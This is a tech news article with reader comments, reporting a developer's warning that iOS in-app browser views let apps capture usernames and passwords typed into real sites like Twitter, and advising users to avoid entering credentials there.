[youtube=https://www.youtube.com/watch?v=2Bl-pJBHYuc]
App developer Craig Hockenberry has published an article today titled “in-app browsers considered harmful” warning both devs and users of security issues related to apps that take advantage of the feature. “Would it surprise you to know that every one of those apps could eavesdrop on your typing? Even when it’s in a secure login screen with a password field?”
Many apps send users to an in-app browser to do things like authenticate logins for associated services. Think logging into an app using your Facebook or Twitter credentials as highlighted in the proof of concept video above. You might assume that would be as safe as doing so through Safari, but Hockenberry notes that, unlike Safari, it’s relatively easy for someone to exploit the feature to capture username and password data:
This is not phishing: the site shown is the actual Twitter website. This technique can be applied to any site that has a input form. All the attacker needs to know can easily be obtained by viewing the public facing HTML on the site… The app is stealing your username and password by watching what you type on the site. There’s nothing the site owner can do about this, since the web view has control over JavaScript that runs in the browser.
The report adds that the technique was tested on iOS 7 and iOS 8. Hockenberry says that is the reason his company’s app Twitterrific “did its token exchange in Safari, even though it’s a more complex user interaction and a more difficult technical implementation.” That, however, isn’t something required by Apple’s app review procedures and users might feel an in-app browser view is as secure as Safari.
Unfortunately, Apple’s current App Review policy does not agree with this recommendation or with Twittterrific’s previous implementation. This is why our update for iOS 8 was delayed—it was the first time since the launch of the App Store that we haven’t had a new version on release day.
The article doesn’t provide any clear recommendations for Apple to remedy the issue and notes “Apple would need to release a new version of iOS for each version that included Safari and WebKit” to fix core issue in WebKit and UIWebView. “No, this is not a WebKit bug… The problem is that an iOS app has as much access to these technologies as the developer of the web page.”
For now, Hockenberry suggests users avoid typing sensitive username or password information in an in-app browser view.
FTC: We use income earning auto affiliate links. More.
Reblogged this on conedogers and commented:
Well… This is a pretty serious problem or over site on Apples part. Or is it? On the one hand, the web view offers the same access as the web developer as I would expect as an IOS developer. This allows the app designer total control over the app login sequence on a web page. I think the real bug here is from the app using the incorrect version of the web app interface. Instead of using a web view to launch a page that allows total exposure of the login process, why not use the twitter published API instead. Sure its a bit more work on the developers side, but it is also more secure than using a web view. For me this falls under using the best practices while developing an app.
This problem isn’t exclusively unique to IOS, if you try hard enough, it can be done on the desktop with safari or chrome extensions and under Internet explorer with their browser helper objects.
kudos to the articles author for pointing this problem out. It’s an easy problem to avoid, just use the right technology to log in with your mobile application.
Nice article. This problem is not exclusively a problem with safari on IOS. I think this really falls under programming best practices, and how to code your app with security in mind. The best way to avoid this bug would be to issue the login directly through an HTTP connection in your app, and not via a web view loading a login page.
thanks for pointing out this issue.
Did I read this wrong? Or did you? He’s saying Safari is fine. In-app browsers are the issue.
You didn’t read it wrong. You can get the same access in safari, chrome and other browsers through plugins. A plugin for the browser, like flash, has the same access to JavaScript as a web view in IOS
I have a feeling Tim Cook will be at work this weekend!
Perfect for the “On the go” lifestyle. I Use this app
everyday.. ” nexscienceDOTcom/Officetogo “
I’m too old to know anything about coding or app development or anything like that, but it’s getting worrisome that every day I’m reading about insecurities with just about everything. From viruses being intentionally released by evildoers, to flaws in various systems that could lead to improper behaviour by the aforementioned evildoers. I know there’ll always be crime, but when the over abundance of it makes me long for the mid-twentieth century before tech, .it’s a little disheartening.
Vulnerabilities of web technology and the tools to browse the www with is something that will always be. It’s an ongoing proces of finding holes, patching them and moving on. The safest internet is the offline internet.
But as a mobile app dev I feel that bringing the safest experience to our users is important. We can only keep up with the latest info and choose the best and safest solution. Investing time in giving the better and safer solution will help your app in the long run (since these kind of messages will keep freigthening people and give hackers room to abuse known technical weaknesses).
So I agree, it is a matter of applying the safest available solutions and the best development paradigms to keep things safe. The safety is only as safe as its weakest link and using a weak link like a webview will not make things safer…